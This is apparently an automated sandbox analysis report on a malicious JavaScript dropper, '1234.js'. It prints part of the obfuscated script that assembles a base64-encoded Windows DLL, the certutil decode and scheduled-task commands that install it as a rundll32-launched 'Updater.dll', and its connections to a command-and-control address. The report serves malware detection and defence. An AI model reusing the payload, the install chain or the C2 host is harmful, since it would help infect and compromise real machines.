Anti Malware Scan Interface: CreateTextFile(encoded_name);var t0='';t0=t0.concat('TVqQAAMAAAAEAAAA//8AAL');t0=t0.concat('gAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGh');t0=t0.concat('pcyBwcm9ncmFtIG');t0=t0.concat('Nhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQR');t0=t0.concat('QAAZIYGAGiDJFsAAAAAAAAAAPAAIiALAgwAADQBAADyAAAAAAAAv');t0=t0.concat('IoAAAAQAAAAAACAAQAAAAAQAAAAAgAABgAAAAAAAAA');t0=t0.concat('GAAAAAAAAAABwAgAABAAAAAA');t0=t0.concat('AAAIAYAEAABAAAAAAAAAQAAAAAAAAAAAQA');t0=t0.concat('AAAAAAAEAAAAAAAAAAAAAAQAAAAUNoBALgAAAAI2wEAjA');t0=t0.concat('AAAABQAgDgAQAAADACAHARAAAAAAAAAAAAAABgA');t0=t0.concat('gDABQAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAA');t0=t0.concat('ABQxQEAcAAAAAAAAAAAAAAAAFABAJADAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV');t0=t0.concat('4dAAAADQyAQAAEAAAADQBAA');t0=t0.concat('AEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAC4lgAAAFABA');t0=t0.concat('ACYAAAAOAEAAAAAAAAAAAAAAAAAQAAAQC5kY');t0=t0.concat('XRhAAAAuD8AAADwAQAAGgAAANA');t0=t0.concat('BAAAAAAAAAAAAAAA');t0=t0.concat('AAEAAAMAucGRhdGEAAHARAAAAMAIAABIAAADq');t0=t0.concat('AQAAAAAAAAAAAAAAA');t0=t0.concat('ABAAABALnJzcmMAAADgAQAAAFACA');t0=t0.concat('AACAAAA/AEAAAAA');t0=t0.concat('AAAAAAAAAAAAQAAAQC5');t0=t0.concat('yZWxvYwAAwAUAAABgAgAABgAAAP4BAAAAAAAAAAAAAAAA');t0=t0.concat('AEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAIPBArhWVVVV9+mLwsHoHwPQjQSVAQAAAMPMzMzM');t0=t0.concat('zMzMSIlcJAhIiXQkEEiJfCQYQY1A/kUz0kiL+kiYSIvZTI');t0=t0.concat('vJSI01yEMBAEiFwA+Ok');t0=t0.concat('AAAAEyNUP9MjVoBSLir');t0=t0.concat('qqqqqqqqqkn34kjR6kj/wkSNFFJBD7ZD/0mDwQR');t0=t0.concat('NjVsDSMHoAg+2BDBBiEH8QQ++');t0=t0.concat('Q/yD4APB4ARIY8hBD7ZD/cHoBEgLyA+2BDFBiEH9QQ++Q/2D4A/B4');t0=t0.concat('AJIY8hBD7ZD/kjB6AZIC8gPtgQxQYhB/kkPvkP+g+A/D7YE');t0=t0.concat('MEGIQf9I/8p1j0U70H1ySWPSSAPXD7YCSMHoAg+');t0=t0.concat('2BDBBiAFBjUD/RDvQD74CdReD4APB4ARImA+2BDBBiEEB');t0=t0.concat('QcZBAj3rL4PgA8HgB');t0=t0.concat('EhjyA+2QgHB6ARIC8gPtgQxQYhBAQ+');t0=t0.concat('+QgGD4A/B4AJImA+2BDBBiEECSYPBA0');t0=t0.concat('n/wUHGQf89SIt0JBBIi3wkGEHGAQBMK8tIi1wkCEmNQQHDzMzMzM');t0=t0.concat('zMzMzMzMzMzEiJXCQISIl0JBBI');t0=t0.concat('iXwkGEGNQP5FM9JIi/pImEiL2UyLyUiNNbhCAQBIh');t0=t0.concat('cAPjpAAAABMjVD/TI1aAUi4q6qqqqqqqqpJ9+J');t0=t0.concat('I0epI/8JEjRRSQQ+2Q/9Jg8E

Potential obfuscated javascript found

Source: 1234.js

Initial file: High amount of function use 7

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose,

11_2_00007FFE1A5113A0

Source: 1234.js

Array : entropy: 5.18, length: 17418, content: '|LJAAA8AAA''(\x27pm\x27);t0=''Zvcm1hdG|d''ol1hIl0JHh''BIjRVRuAAA''Xb/Xa\x27);t0''ACjMAQABIw''a\x27)

Go to definition

Source: C:\Windows\System32\certutil.exe	File created: C:\Users\user\AppData\Local\Temp\rad00257.tmp			Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\Tyrannosaurus Tech\Updater.dll			Jump to dropped file

Source: C:\Windows\System32\msiexec.exe

File created: C:\ProgramData\Tyrannosaurus Tech\Updater.dll

Jump to dropped file

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Tasks\Tyrannosaurus Tech.job

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses certutil -decode

Source: unknown	Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Source: unknown	Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A515E70 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

11_2_00007FFE1A515E70

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\System32\rundll32.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_11-7382

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\certutil.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rad00257.tmp			Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\Tyrannosaurus Tech\Updater.dll			Jump to dropped file

Source: C:\Windows\System32\rundll32.exe

Last function: Thread delayed

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose,

11_2_00007FFE1A5113A0

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A511870 GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

11_2_00007FFE1A511870

Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A51E994 IsDebuggerPresent,__crtUnhandledException,

11_2_00007FFE1A51E994

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A52036C EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

11_2_00007FFE1A52036C

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose,

11_2_00007FFE1A5113A0

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A51B5A8 GetProcessHeap,

11_2_00007FFE1A51B5A8

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A51C538 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

11_2_00007FFE1A51C538

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe

Network Connect: 185.161.251.26 443

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A51BDA8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

11_2_00007FFE1A51BDA8

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A5145E0 GetVolumeInformationW,GetModuleHandleW,GetComputerNameW,GetModuleHandleW,GetComputerNameExW,GetModuleHandleW,GetUserNameW,GetModuleHandleW,OpenMutexW,CloseHandle,GetModuleHandleW,GetTickCount,SleepEx,

11_2_00007FFE1A5145E0

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A515A20 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,GetSystemInfo,GetSystemMetrics,

11_2_00007FFE1A515A20

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	33 Scripting	Valid Accounts	2 Scheduled Task/Job	33 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	2 Scheduled Task/Job	2 Scheduled Task/Job	11 Process Injection	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Data Encoding	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	15 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1234.js	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\Tyrannosaurus Tech\Updater.dll	8%	ReversingLabs	Win64.Malware.Generic
C:\Users\user\AppData\Local\Temp\rad00257.tmp	8%	ReversingLabs	Win64.Malware.Generic

Name	Source	Malicious	Reputation
https://185.161.251.26/O&=	rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://185.161.251.26/	rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://185.161.251.26/0	rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://185.161.251.26/P	rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFAC000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://185.161.251.26/I	rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF7A000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://185.161.251.26/nfoEx2	rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFD3000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.161.251.26	unknown	United Kingdom		5089	NTLGB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541406
Start date and time:	2024-10-24 19:47:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (Javascript) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1234.js
Detection:	MAL
Classification:	mal76.evad.winJS@8/4@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 20 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 1234.js

Simulations

Behavior and APIs

Time	Type	Description
13:50:10	API Interceptor	1x Sleep call for process: msiexec.exe modified
13:50:13	API Interceptor	1x Sleep call for process: rundll32.exe modified
18:48:40	Task Scheduler	Run new task: {65430329-E14B-45C7-815F-1545FB9EBEE9} path: certutil s>-decode rad603BF.tmp rad00257.tmp
18:48:40	Task Scheduler	Run new task: {D7AC511B-6643-49BE-900E-4E0C51F57196} path: msiexec s>/y C:\Users\user\AppData\Local\Temp\rad00257.tmp

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.161.251.26	Updater.dll.dll	Get hash	malicious	Unknown	Browse
185.161.251.26	Updater.dll.dll	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NTLGB	newsample	Get hash	malicious	Mirai, Okiru	Browse	217.137.58.145
	Updater.dll.dll	Get hash	malicious	Unknown	Browse	185.161.251.26
	Updater.dll.dll	Get hash	malicious	Unknown	Browse	185.161.251.26
	o2YUBeMZW6.elf	Get hash	malicious	Mirai	Browse	86.8.111.22
	G63E6opeS8.elf	Get hash	malicious	Mirai	Browse	62.253.81.1
	ai3eCONS9Q.elf	Get hash	malicious	Mirai	Browse	62.31.100.51
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	80.5.205.110
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	86.13.197.104
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	86.1.9.11
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	82.10.79.183

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	Updater.dll.dll	Get hash	malicious	Unknown	Browse	185.161.251.26
	Updater.dll.dll	Get hash	malicious	Unknown	Browse	185.161.251.26
	xxJfSec58P.exe	Get hash	malicious	Vidar	Browse	185.161.251.26
	UMrFwHyjUi.exe	Get hash	malicious	Vidar	Browse	185.161.251.26
	b157p9L0c1.exe	Get hash	malicious	Vidar	Browse	185.161.251.26
	PFlJLzFUqH.exe	Get hash	malicious	Vidar	Browse	185.161.251.26
	46QSz6qyKC.exe	Get hash	malicious	Vidar	Browse	185.161.251.26
	7ZthFNAqYp.exe	Get hash	malicious	Vidar	Browse	185.161.251.26
	M8PoiLFYWM.exe	Get hash	malicious	Vidar	Browse	185.161.251.26
	Unlock_Tool_2.3.1.exe	Get hash	malicious	Vidar	Browse	185.161.251.26

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	132096
Entropy (8bit):	6.07698299320588
Encrypted:	false
SSDEEP:	3072:Jhw2Pja55J8hTGMjctYnc/F5ipfVMFY1lz:Jhwv55WT7ctiiF5cv
MD5:	80CD37D9EB33507BF054F32CE2380B09
SHA1:	6E8D57DDE537ACE0639931569AE2B04B9CB99A26
SHA-256:	F47144C7159BE31D8116FDC36B66CB72C917CD91A4BBE9EAA55DEC929C1CFFDD
SHA-512:	18F42496C4A66F11AA834E1DB7F727EA7041882408A83BE00F5DDACFBCA439DEBE611F24EADD19E9453BC774D91D33D98AC25290791D501AF2E706DC9EF89BDE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h.$[.........." .....4...................................................p............`.........................................P................P.......0..p............`......................................P...p............P...............................text...42.......4.................. ..`.rdata.......P.......8..............@..@.data....?..........................@....pdata..p....0......................@..@.rsrc........P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\rad00257.tmp

Download File

Process:	C:\Windows\System32\certutil.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	132096
Entropy (8bit):	6.07698299320588
Encrypted:	false
SSDEEP:	3072:Jhw2Pja55J8hTGMjctYnc/F5ipfVMFY1lz:Jhwv55WT7ctiiF5cv
MD5:	80CD37D9EB33507BF054F32CE2380B09
SHA1:	6E8D57DDE537ACE0639931569AE2B04B9CB99A26
SHA-256:	F47144C7159BE31D8116FDC36B66CB72C917CD91A4BBE9EAA55DEC929C1CFFDD
SHA-512:	18F42496C4A66F11AA834E1DB7F727EA7041882408A83BE00F5DDACFBCA439DEBE611F24EADD19E9453BC774D91D33D98AC25290791D501AF2E706DC9EF89BDE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h.$[.........." .....4...................................................p............`.........................................P................P.......0..p............`......................................P...p............P...............................text...42.......4.................. ..`.rdata.......P.......8..............@..@.data....?..........................@....pdata..p....0......................@..@.rsrc........P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\rad603BF.tmp

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	176130
Entropy (8bit):	5.072583471283548
Encrypted:	false
SSDEEP:	3072:p5iLDOXI96FfMKwPbKY1SW2NTP+igGw2unRXgX4un/M5FsmpyCypLoDMScTV10jI:p5ifOXIsfMdjKY1SW2NTP+i0IXnWsmMZ
MD5:	5C91300ACF12FA101D7741CB94460BE3
SHA1:	38EEBC11F2500C9B5F71A196448C113C1C5A0AA4
SHA-256:	54348D3F893581E89C38C677AE8EFA411FFAC1AE015B8CEC599C30292B509407
SHA-512:	F772E78FA8A24BD28CB1D17989B33E89AD82837E4973C94A82CFBBEDD4B7ABF30CEEF1BEC143308499D6434CA24EEE2E9B34BC4174FA8265F6258E82E52736D7
Malicious:	false
Reputation:	low
Preview:	TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYGAGiDJFsAAAAAAAAAAPAAIiALAgwAADQBAADyAAAAAAAAvIoAAAAQAAAAAACAAQAAAAAQAAAAAgAABgAAAAAAAAAGAAAAAAAAAABwAgAABAAAAAAAAAIAYAEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAUNoBALgAAAAI2wEAjAAAAABQAgDgAQAAADACAHARAAAAAAAAAAAAAABgAgDABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQxQEAcAAAAAAAAAAAAAAAAFABAJADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAADQyAQAAEAAAADQBAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAC4lgAAAFABAACYAAAAOAEAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAuD8AAADwAQAAGgAAANABAAAAAAAAAAAAAAAAAEAAAMAucGRhdGEAAHARAAAAMAIAABIAAADqAQAAAAAAAAAAAAAAAABAAABALnJzcmMAAADgAQAAAFACAAACAAAA/AEAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAAwAUAAABgAgAABgAAAP4BAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

C:\Windows\Tasks\Tyrannosaurus Tech.job

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	352
Entropy (8bit):	3.5679561447062436
Encrypted:	false
SSDEEP:	6:Z4djt/82On+SkSJkJAWhAlAtebhEZDvAJDiAjgsW2YRZuy0lpn1:uthO+fTWljbruAjzvYRQVp1
MD5:	C55CE93EEE0F61144FC37E50CBAEB2B2
SHA1:	0CFB9BF261E7C51D6AAA879A1670B8C7EBD6563C
SHA-256:	72859B2FCABBFB69399D1C8A82EC4BED07B4CEAA83E8954CF9975ED5F991FB43
SHA-512:	1A1B2C35B3D3B99CB122CFC83616953629F7B618454F99623624B9EA8ABB49D5000F5BE07EA90D95708AB7103588421F0B387BC541F4242A0999876E5DCB32AA
Malicious:	false
Preview:	......._.<O.......F.......<... .....\.......... ....................!.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.r.u.n.d.l.l.3.2...e.x.e...9.".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.T.y.r.a.n.n.o.s.a.u.r.u.s. .T.e.c.h.\.U.p.d.a.t.e.r...d.l.l.".,.S.t.a.r.t. ./.u.......J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................3.............................

Static File Info

General

File type:	ASCII text, with very long lines (65536), with no line terminators
Entropy (8bit):	5.257062743918368
TrID:
File name:	1234.js
File size:	731'296 bytes
MD5:	7dea02845300c31f60e21494c492c870
SHA1:	8ebbbeeb723eea278a343e95d1243577c445845b
SHA256:	9b38cc509b1a4a401275bcb5e896917c842431f9190c417147c35b20b99c4d85
SHA512:	311e25c9cd9523bb3c27f54a047800ad14461b130a976680bcd4aaf18822031fc803ba53501e8694a9c15e5fc3f097d1ad30be5cca98021563080850f82f4d0c
SSDEEP:	12288:KevpQrCCUXwreRfwt9lZuldlSzC0R7rgFC:K2pQrTUXwrgo1ZUVWXgFC
TLSH:	27F48224370079B927D70BF3FE5070D299045E8E754841BBA64B7B7ABD4E4A0E9B2C72
File Content Preview:	function a0_0x31b0(_0x189288,_0x24a2a1){var _0x22e077=a0_0x22e0();return a0_0x31b0=function(_0x31b09f,_0x5b8e46){_0x31b09f=_0x31b09f-0x78;var _0x404deb=_0x22e077[_0x31b09f];return _0x404deb;},a0_0x31b0(_0x189288,_0x24a2a1);}function a0_0x22e0(){var _0x5e8

File Icon


Icon Hash:	68d69b8bb6aa9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T19:50:13.785415+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	50002	185.161.251.26	443	TCP
2024-10-24T19:50:14.836595+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	50003	185.161.251.26	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 19:50:12.907144070 CEST	50002	443	192.168.2.4	185.161.251.26
Oct 24, 2024 19:50:12.907246113 CEST	443	50002	185.161.251.26	192.168.2.4
Oct 24, 2024 19:50:12.907351971 CEST	50002	443	192.168.2.4	185.161.251.26
Oct 24, 2024 19:50:12.917155027 CEST	50002	443	192.168.2.4	185.161.251.26
Oct 24, 2024 19:50:12.917191982 CEST	443	50002	185.161.251.26	192.168.2.4
Oct 24, 2024 19:50:13.785280943 CEST	443	50002	185.161.251.26	192.168.2.4
Oct 24, 2024 19:50:13.785414934 CEST	50002	443	192.168.2.4	185.161.251.26
Oct 24, 2024 19:50:13.848578930 CEST	50002	443	192.168.2.4	185.161.251.26
Oct 24, 2024 19:50:13.848865986 CEST	443	50002	185.161.251.26	192.168.2.4
Oct 24, 2024 19:50:13.848937988 CEST	50002	443	192.168.2.4	185.161.251.26
Oct 24, 2024 19:50:13.959774971 CEST	50003	443	192.168.2.4	185.161.251.26
Oct 24, 2024 19:50:13.959804058 CEST	443	50003	185.161.251.26	192.168.2.4
Oct 24, 2024 19:50:13.959904909 CEST	50003	443	192.168.2.4	185.161.251.26
Oct 24, 2024 19:50:13.971267939 CEST	50003	443	192.168.2.4	185.161.251.26
Oct 24, 2024 19:50:13.971287012 CEST	443	50003	185.161.251.26	192.168.2.4
Oct 24, 2024 19:50:14.836410046 CEST	443	50003	185.161.251.26	192.168.2.4
Oct 24, 2024 19:50:14.836595058 CEST	50003	443	192.168.2.4	185.161.251.26

Target ID:	0
Start time:	13:48:04
Start date:	24/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js"
Imagebase:	0x7ff713c50000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:48:40
Start date:	24/10/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Imagebase:	0x7ff72fcc0000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:48:40
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
